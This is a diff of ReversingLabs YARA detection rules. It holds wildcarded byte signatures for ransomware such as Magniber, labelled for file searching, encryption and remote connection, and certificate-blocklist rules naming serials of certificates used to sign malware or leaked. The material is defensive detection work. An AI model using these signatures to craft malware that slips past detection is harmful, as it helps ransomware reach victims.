?? ?? ?? ?? C6 01 ?? E8 ?? ?? ?? ?? E8 + ?? ?? ?? ?? 83 C4 ?? 8B E5 5D C2 + } + $find_files_1_1 = { + 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 55 ?? 8D 8D ?? ?? ?? + ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 78 ?? ?? 72 ?? 8B 00 8D 8D ?? ?? ?? ?? 51 50 FF 15 ?? + ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B D8 89 9D ?? ?? ?? ?? 83 F9 ?? 72 ?? 8B 95 ?? ?? ?? ?? + 41 81 F9 ?? ?? ?? ?? 72 ?? F6 C2 ?? 74 ?? E8 ?? ?? ?? ?? 8B 42 ?? 3B C2 72 ?? E8 ?? + ?? ?? ?? 2B D0 83 FA ?? 73 ?? E8 ?? ?? ?? ?? 83 FA ?? 76 ?? E8 ?? ?? ?? ?? 8B D0 52 + E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? + C6 85 ?? ?? ?? ?? ?? 83 FB ?? 75 ?? 53 FF 15 ?? ?? ?? ?? 32 DB E9 ?? ?? ?? ?? C7 85 + ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 8D 85 ?? + ?? ?? ?? C6 45 ?? ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? F6 85 ?? ?? ?? + ?? ?? 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 + } + $find_files_1_2 = { + 8A 10 3A 11 75 ?? 84 D2 74 ?? 8A 50 ?? 3A 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 84 D2 75 ?? + 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? + 8A 10 3A 11 75 ?? 84 D2 74 ?? 8A 50 ?? 3A 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 84 D2 75 ?? + 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? C7 85 ?? ?? + ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 75 ?? 33 C9 EB + ?? 8D 8D ?? ?? ?? ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 2B CA 51 8D 85 ?? ?? ?? ?? 50 8D + 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 55 ?? 8D 8D ?? ?? + ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 EC ?? + 8B CC C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 83 79 ?? ?? 72 ?? 8B 01 EB ?? 8B C1 + 6A ?? C6 00 ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 + 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? + ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 75 ?? 33 C9 EB ?? 8D 8D + ?? ?? ?? ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 2B CA 51 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? + ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8D 8D ?? ?? ?? + ?? 8B 95 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 83 FE ?? 0F 43 C2 0F 43 CA 89 85 ?? ?? ?? ?? + 8B 85 ?? ?? ?? ?? 03 C1 83 FE ?? 8B F8 0F 43 DA 33 C9 2B FB 33 F6 3B D8 0F 47 F9 85 + FF 74 ?? 0F BE 04 33 50 E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 83 C4 ?? 88 04 31 46 3B F7 + 75 ?? 33 C0 89 85 ?? ?? ?? ?? 8B 94 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 + 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 80 3A ?? 75 ?? 33 C9 EB ?? 8B CA 8D + 71 ?? 8A 01 41 84 C0 75 ?? 2B CE 51 52 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? + 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 F9 ?? 0F + 43 C2 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 0F 43 C2 03 85 ?? ?? ?? ?? 83 F9 ?? 8B F8 + 0F 43 DA 33 F6 2B FB 3B D8 0F 47 FE 85 FF 74 + } + $encrypt_files = { + 8A 01 41 84 C0 75 ?? 2B CA C6 85 ?? ?? ?? ?? ?? 33 C0 88 84 05 ?? ?? ?? ?? 40 3D ?? + ?? ?? ?? 72 ?? 33 F6 8B C6 33 D2 F7 F1 8A 04 3A 02 C1 30 84 35 ?? ?? ?? ?? 46 81 FE + ?? ?? ?? ?? 72 ?? 83 7D ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? 0F 43 45 ?? 50 E8 ?? ?? ?? ?? + 68 ?? ?? ?? ?? 8D 55 ?? 8B F8 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? + 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 0F 43 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B + D8 85 FF 74 ?? 85 DB 74 ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 57 68 ?? ?? ?? ?? + 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 8B F0 8D 85 ?? + ?? ?? ?? 50 E8 ?? ?? ?? ?? 53 56 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 57 E8 ?? + ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? + 83 7D ?? ?? 8D 45 ?? 0F 43 45 ?? 50 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ?? 83 F8 + ?? 72 ?? 8B 8D ?? ?? ?? ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 74 ?? E8 ?? ?? ?? ?? 8B + 41 ?? 3B C1 72 ?? E8 ?? ?? ?? ?? 2B C8 83 F9 ?? 73 ?? E8 ?? ?? ?? ?? 83 F9 ?? 76 ?? + E8 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? + ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 83 F8 ?? 72 ?? 8B 4D ?? 40 3D + ?? ?? ?? ?? 72 ?? F6 C1 ?? 74 ?? E8 ?? ?? ?? ?? 8B 41 ?? 3B C1 72 ?? E8 ?? ?? ?? ?? + 2B C8 83 F9 ?? 73 ?? E8 ?? ?? ?? ?? 83 F9 ?? 76 ?? E8 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? + ?? ?? 83 C4 ?? 8B 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 83 F8 + ?? 72 ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 74 ?? E8 ?? ?? ?? ?? 8B 41 ?? 3B + C1 72 ?? E8 ?? ?? ?? ?? 2B C8 83 F9 ?? 73 ?? E8 ?? ?? ?? ?? 83 F9 ?? 76 ?? E8 ?? ?? + ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B + 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 + } + + condition: + uint16(0)==0x5A4D and $find_files_1_0 and $find_files_1_1 and $find_files_1_2 and $encrypt_files +} +rule REVERSINGLABS_Win32_Ransomware_Magniber : TC_DETECTION MALICIOUS MALWARE FILE +{ + meta: + description = "Yara rule that detects Magniber ransomware." + author = "ReversingLabs" + id = "07b6c938-aa25-5ff6-95d2-9e0f84c41b41" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L5884-L5900" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "79b6df421c78fd3e2f05a60f7d875e02519297a0278614c9f63dff8b1b2a2d18" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Magniber.yara#L1-L114" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "05b516f9b466489ea3a30e2fe5eb08290e85ece7a63e29e8bbbeb81c87d0a6f1" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Magniber" + tc_detection_factor = 5 importance = 25 + strings: + $remote_connection = { + E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B 55 + ?? 52 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF + 15 ?? ?? ?? ?? 8B 55 ?? 52 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D + 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B 55 ?? 52 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? + ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 89 45 ?? 6A ?? 6A ?? 6A ?? 6A ?? + 8D 8D ?? ?? ?? ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 6A + ?? 8D 45 ?? 50 8D 4D ?? 51 68 ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 83 7D ?? ?? + 74 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 33 C0 E9 ?? ?? ?? + ?? 8B 55 ?? 83 C2 ?? 52 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D + ?? ?? 75 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 33 C0 EB ?? + C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? + ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51 FF 15 + } + $encrypt_files_1 = { + 55 8B EC 83 EC ?? 56 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? + C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? + C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? + ?? ?? ?? 89 45 ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 45 ?? 8B 55 ?? 03 55 ?? 8D 44 12 + ?? 50 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? EB + ?? 8B 4D ?? 83 C1 ?? 89 4D ?? 8B 55 ?? 3B 55 ?? 7D ?? 8B 45 ?? 8B 4D ?? 8B 55 ?? 8B + 75 ?? 66 8B 14 56 66 89 14 41 EB ?? B8 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? 66 89 04 4A C7 + 45 ?? ?? ?? ?? ?? EB ?? 8B 45 ?? 83 C0 ?? 89 45 ?? 8B 4D ?? 3B 4D ?? 7D ?? 8B 55 ?? + 03 55 ?? 8B 45 ?? 8B 4D ?? 8B 75 ?? 66 8B 0C 4E 66 89 4C 50 ?? EB ?? 8B 55 ?? 03 55 + ?? 33 C0 8B 4D ?? 66 89 44 51 ?? 8D 55 ?? 52 8D 45 ?? 50 8D 4D ?? 51 8B 55 ?? 52 8B + } + $encrypt_files_2 = { + 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 68 ?? + ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 45 ?? 83 + 7D ?? ?? 75 ?? 33 C0 E9 ?? ?? ?? ?? 8D 55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 + 75 ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 33 C0 E9 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? + 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 + ?? ?? ?? ?? 8B 45 ?? 83 C0 ?? 50 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 45 + ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 66 0F 57 C0 66 0F 13 45 ?? 6A ?? 8D 4D ?? 51 6A ?? + 8B 55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 99 8B 4D ?? + 2B 4D ?? 8B 75 ?? 1B 75 ?? 89 45 ?? 89 55 ?? 89 4D ?? 89 75 ?? 8B 55 ?? 3B 55 ?? 7C + ?? 7F ?? 8B 45 ?? 3B 45 ?? 76 ?? 8B 4D ?? 2B 4D ?? 8B 55 ?? 1B 55 ?? 89 4D ?? 89 55 + ?? EB ?? 8B 45 ?? 99 89 45 ?? 89 55 ?? 6A ?? 8D 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B + } + $encrypt_files_3 = { + 45 ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 33 C0 E9 ?? ?? ?? ?? 83 7D ?? + ?? 75 ?? E9 ?? ?? ?? ?? 8B 4D ?? 3B 4D ?? 73 ?? C7 45 ?? ?? ?? ?? ?? 8B 55 ?? 89 55 + ?? 8B 45 ?? 50 8D 4D ?? 51 6A ?? 6A ?? 8B 55 ?? 52 6A ?? 8B 45 ?? 50 FF 15 ?? ?? ?? + ?? 89 45 ?? 83 7D ?? ?? 74 ?? 8B 4D ?? 51 8D 55 ?? 52 8B 45 ?? 50 6A ?? 8B 4D ?? 51 + 6A ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B 45 + ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? EB ?? + E9 ?? ?? ?? ?? 8B 45 ?? 50 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 7D ?? ?? + 74 ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? + 83 7D ?? ?? 74 ?? 6A ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8D 4D ?? 51 8B 55 ?? 52 FF 15 + ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 3B 45 ?? 7C ?? 7F ?? 8B 4D ?? 3B 4D ?? + 76 ?? 83 7D ?? ?? 74 ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? + 8B 4D ?? 51 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? + 83 C4 ?? B8 ?? ?? ?? ?? EB + } + $search_files = { + C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 + 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 + 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 + 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 + 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 + 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 + 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 + 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 + 45 ?? ?? ?? ?? ?? EB ?? 8B 45 ?? 83 C0 ?? 89 45 ?? 83 7D ?? ?? 7D ?? 8B 4D ?? 8B 94 + 8D ?? ?? ?? ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 33 C0 E9 ?? ?? ?? + ?? EB ?? 8B 4D ?? 8B 55 ?? 8B 81 ?? ?? ?? ?? 3B 82 ?? ?? ?? ?? 76 ?? B8 ?? ?? ?? ?? + E9 ?? ?? ?? ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 75 ?? B8 ?? + ?? ?? ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 55 ?? 52 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? + ?? 83 C4 ?? 8B 8D ?? ?? ?? ?? 83 C1 ?? 89 8D ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? + 83 C4 ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 45 ?? 83 C0 ?? 50 + FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 8B 4D ?? 83 C1 ?? 51 FF 15 ?? ?? ?? ?? + 85 C0 75 ?? EB ?? 8B 55 ?? 52 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 83 C1 + ?? 51 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 + C4 ?? 85 C0 74 ?? 8B 4D ?? 81 79 ?? ?? ?? ?? ?? 75 ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? + ?? 52 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 8B 4D ?? + 81 79 ?? ?? ?? ?? ?? 75 ?? 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? + ?? 51 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 03 45 ?? 89 + 45 ?? E9 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 6A ?? 8B 4D ?? 81 C1 ?? ?? ?? ?? 51 8B 55 ?? + 81 C2 ?? ?? ?? ?? 52 8B 45 ?? 05 ?? ?? ?? ?? 50 8B 4D ?? 81 C1 ?? ?? ?? ?? 51 8B 55 + ?? 81 C2 ?? ?? ?? ?? 52 8B 45 ?? 05 ?? ?? ?? ?? 50 8B 4D ?? 81 C1 ?? ?? ?? ?? 51 8B + 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 E8 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "NOSOV SP Z O O" and pe.signatures[i].serial=="0b:ab:6a:2a:a8:4b:49:5d:9e:55:4a:4c:42:c0:12:6d" and 1597971600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($search_files and ( all of ($encrypt_files_*)) and $remote_connection) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_6314001C3235Cd59Bcc3F5278C518804 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_05E2E6A4Cd09Ea54D665B075Fe22A256 : INFO FILE { meta: - description = "Certificate used for digitally signing malware." + description = "The digital certificate has leaked." author = "ReversingLabs" - id = "aff0fb76-587b-5493-810c-ac32a6ba9576" + id = "824c6b2f-081a-5f38-b949-d802f59e6ced" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L5902-L5918" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "4320f3884c0f7e4939e8988a4e83b8028a5e01fb425ae4faa2273134db835813" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L27-L43" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "43da21d9c7ae9bfcc7fe4ee69f9d46cbce1954785d56c1d424b36deb8afe592e" score = 75 quality = 90 tags = "INFO, FILE" @@ -8737,22 +28528,22 @@ rule REVERSINGLABS_Cert_Blocklist_6314001C3235Cd59Bcc3F5278C518804 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "GIE-MUTUALISTE" and pe.signatures[i].serial=="63:14:00:1c:32:35:cd:59:bc:c3:f5:27:8c:51:88:04" and 1600304400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "*.google.com" and pe.signatures[i].serial=="05:e2:e6:a4:cd:09:ea:54:d6:65:b0:75:fe:22:a2:56" and 1308182400<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_0Ed8Ade5D73B73Dade6943D557Ff87E5 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_77019A082385E4B73F569569C9F87Bb8 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "dbfae40c-2f81-5daf-8655-d06ae38ffa8f" + id = "4046a31b-d7c8-5c63-b5b2-2179b0817b03" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L5920-L5936" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "7796b6e7da900be8634e7f1e51cda1275ab1e7c2709af7ecaa8777ab0b518494" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L45-L61" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "8613986005bdd30d92e633fa2058be5c43f1c530b9dc6d80ec953f12f6d66ce7" score = 75 quality = 90 tags = "INFO, FILE" @@ -8762,22 +28553,22 @@ rule REVERSINGLABS_Cert_Blocklist_0Ed8Ade5D73B73Dade6943D557Ff87E5 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Rumikon LLC" and pe.signatures[i].serial=="0e:d8:ad:e5:d7:3b:73:da:de:69:43:d5:57:ff:87:e5" and 1597885200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "AND LLC" and pe.signatures[i].serial=="77:01:9a:08:23:85:e4:b7:3f:56:95:69:c9:f8:7b:b8" and 1308182400<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_0292C7D574132Ba5C0441D1C7Ffcb805 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_4F2Ef29Ca5F96E5777B82C62F34Fd3A6 : INFO FILE { meta: - description = "Certificate used for digitally signing malware." + description = "The digital certificate has leaked." author = "ReversingLabs" - id = "ef58cf01-9c54-5dbb-99a7-d3ca42663133" + id = "6cfb6ae0-8eba-503b-8bb7-ac72746d9aa2" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L5938-L5954" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "d2bcf72f4c5829d161bc40e820eb0b1a85deaa49b749422d5429e27b7fb2b1fe" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L63-L79" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "e8f27c4a72f416a16acabb1de606fdde7dc694256809fdb952a25313dda0d34e" score = 75 quality = 90 tags = "INFO, FILE" @@ -8787,22 +28578,22 @@ rule REVERSINGLABS_Cert_Blocklist_0292C7D574132Ba5C0441D1C7Ffcb805 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "TES LOGISTIKA d.o.o." and pe.signatures[i].serial=="02:92:c7:d5:74:13:2b:a5:c0:44:1d:1c:7f:fc:b8:05" and 1602183720<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Bit9, Inc" and pe.signatures[i].serial=="4f:2e:f2:9c:a5:f9:6e:57:77:b8:2c:62:f3:4f:d3:a6" and 1342051200<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_1F23F001458716D435Cca1A55D660Ec5 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_7Cc1Db2Ad0A290A4Bfe7A5F336D6800C : INFO FILE { meta: - description = "Certificate used for digitally signing malware." + description = "The digital certificate has leaked." author = "ReversingLabs" - id = "16614e20-1cf1-55c0-a04c-d99c06fb29a2" + id = "89bc7c99-dea2-50ce-a0d2-4292c14d049e" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L5956-L5972" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "bacfb4b7900ab57d23474e0422bd74fff113296b8db37e8eae3bd456443d28d6" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L81-L97" + license_url = 